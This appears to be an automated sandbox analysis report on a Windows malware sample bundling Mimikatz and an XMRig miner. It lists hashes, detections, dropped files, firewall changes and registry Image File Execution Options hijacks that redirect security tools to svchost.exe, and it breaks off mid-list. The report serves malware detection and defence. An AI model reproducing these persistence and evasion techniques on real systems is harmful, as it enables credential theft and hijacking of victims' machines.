Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
12-08-2024 07:18
Behavioral task
behavioral1
Sample
2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe
-
Size
8.3MB
-
MD5
835a2360a11924db990e8cbd0c8bc692
-
SHA1
4c4ef0bd7d8e483dbc6c51af2c28ccc06ad418a9
-
SHA256
c72529a9e4b92eb7d5600123453b2bd29cab4a68aa47f7646877e687b0c8e7c2
-
SHA512
d8c613c8741f1eb6c1550f282b3a494af1bc57907bfad08a140c01d2b5cfcd403c7d1c6b86ea98aaa493e0bd178ee7f9dec17d17ce2469261a1f43cccb631dec
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3536 created 2132 3536 iuclszl.exe 38 -
Contacts a large (28675) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3756-181-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-194-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-200-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-212-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-218-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-234-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-245-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-252-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-253-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-254-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-255-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig behavioral2/memory/3756-257-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/4996-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4996-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00080000000234d8-5.dat mimikatz behavioral2/memory/216-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3616-136-0x00007FF6D38B0000-0x00007FF6D399E000-memory.dmp mimikatz behavioral2/memory/3616-138-0x00007FF6D38B0000-0x00007FF6D399E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts iuclszl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts iuclszl.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe iuclszl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe iuclszl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" iuclszl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2404 netsh.exe 2288 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 216 iuclszl.exe 3536 iuclszl.exe 1152 wpcap.exe 1036 qeteblhlu.exe 3616 vfshost.exe 4228 teaimmcwl.exe 1940 xohudmc.exe 1408 ogmqci.exe 3756 nqrzsm.exe 4896 teaimmcwl.exe 4860 teaimmcwl.exe 748 teaimmcwl.exe 2268 teaimmcwl.exe 4272 teaimmcwl.exe 4468 teaimmcwl.exe 2708 teaimmcwl.exe 4228 teaimmcwl.exe 4000 teaimmcwl.exe 3952 teaimmcwl.exe 1956 teaimmcwl.exe 4376 teaimmcwl.exe 3268 teaimmcwl.exe 3480 teaimmcwl.exe 4536 iuclszl.exe 2708 teaimmcwl.exe 4836 teaimmcwl.exe 888 teaimmcwl.exe 5012 nvmribbga.exe 5836 iuclszl.exe -
Loads dropped DLL 12 IoCs
pid Process 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1152 wpcap.exe 1036 qeteblhlu.exe 1036 qeteblhlu.exe 1036 qeteblhlu.exe -
resource yara_rule behavioral2/files/0x0007000000023529-134.dat upx behavioral2/memory/3616-136-0x00007FF6D38B0000-0x00007FF6D399E000-memory.dmp upx behavioral2/memory/3616-138-0x00007FF6D38B0000-0x00007FF6D399E000-memory.dmp upx behavioral2/files/0x0007000000023534-141.dat upx behavioral2/memory/4228-142-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/4228-157-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/files/0x0007000000023531-164.dat upx behavioral2/memory/3756-165-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/4896-171-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/4860-175-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/748-179-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-181-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/2268-184-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/4272-188-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/4468-192-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-194-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/2708-197-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-200-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/4228-202-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/4000-206-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3952-210-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-212-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/1956-215-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-218-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/4376-220-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3268-224-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3480-228-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/2708-233-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-234-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/4836-236-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/888-238-0x00007FF674620000-0x00007FF67467B000-memory.dmp upx behavioral2/memory/3756-245-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/3756-252-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/3756-253-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/3756-254-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/3756-255-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx behavioral2/memory/3756-257-0x00007FF69AC10000-0x00007FF69AD30000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 77 ifconfig.me 80 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iuclszl.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iuclszl.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iuclszl.exe File opened for modification C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2DEAA270F2A3ADDABB8505E3C5BD28E8 iuclszl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2DEAA270F2A3ADDABB8505E3C5BD28E8 iuclszl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\ogmqci.exe xohudmc.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\dvpvfgkqq\UnattendGC\specials\ssleay32.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\docmicfg.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\ip.txt iuclszl.exe File opened for modification C:\Windows\bekggbli\svschost.xml iuclszl.exe File opened for modification C:\Windows\bekggbli\schoedcl.xml iuclszl.exe File created C:\Windows\bekggbli\iuclszl.exe 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\libxml2.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\svschost.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\schoedcl.xml iuclszl.exe File created C:\Windows\bekggbli\svschost.xml iuclszl.exe File created C:\Windows\ime\iuclszl.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\trch-1.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\tucl-1.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\spoolsrv.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\coli-0.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\xdvl-0.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\AppCapture64.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\Corporate\mimilib.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.dll iuclszl.exe File created C:\Windows\bekggbli\spoolsrv.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\Corporate\vfshost.exe iuclszl.exe File opened for modification C:\Windows\bekggbli\vimpcsvc.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\AppCapture32.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\spoolsrv.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\spoolsrv.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\docmicfg.xml iuclszl.exe File opened for modification C:\Windows\bekggbli\iuclszl.exe 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe File created C:\Windows\bekggbli\docmicfg.xml iuclszl.exe File opened for modification C:\Windows\bekggbli\spoolsrv.xml iuclszl.exe File opened for modification C:\Windows\dvpvfgkqq\vefdcrtiv\Packet.dll iuclszl.exe File opened for modification C:\Windows\bekggbli\docmicfg.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\upbdrjv\swrpwe.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\zlib1.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\schoedcl.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\exma-1.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\libeay32.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\ucl.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\vimpcsvc.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\vimpcsvc.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\svschost.xml iuclszl.exe File created C:\Windows\bekggbli\schoedcl.xml iuclszl.exe File opened for modification C:\Windows\dvpvfgkqq\Corporate\log.txt cmd.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\trfo-2.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\schoedcl.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\svschost.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\docmicfg.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\Shellcode.ini iuclszl.exe File opened for modification C:\Windows\dvpvfgkqq\vefdcrtiv\Result.txt nvmribbga.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exe iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\cnli-1.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\crli-0.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\Corporate\mimidrv.sys iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\tibe-2.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\vimpcsvc.xml iuclszl.exe File created C:\Windows\bekggbli\vimpcsvc.xml iuclszl.exe File created C:\Windows\dvpvfgkqq\vefdcrtiv\Packet.dll iuclszl.exe File created C:\Windows\dvpvfgkqq\UnattendGC\specials\posh-0.dll iuclszl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4980 sc.exe 1740 sc.exe 4384 sc.exe 4368 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qeteblhlu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ogmqci.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 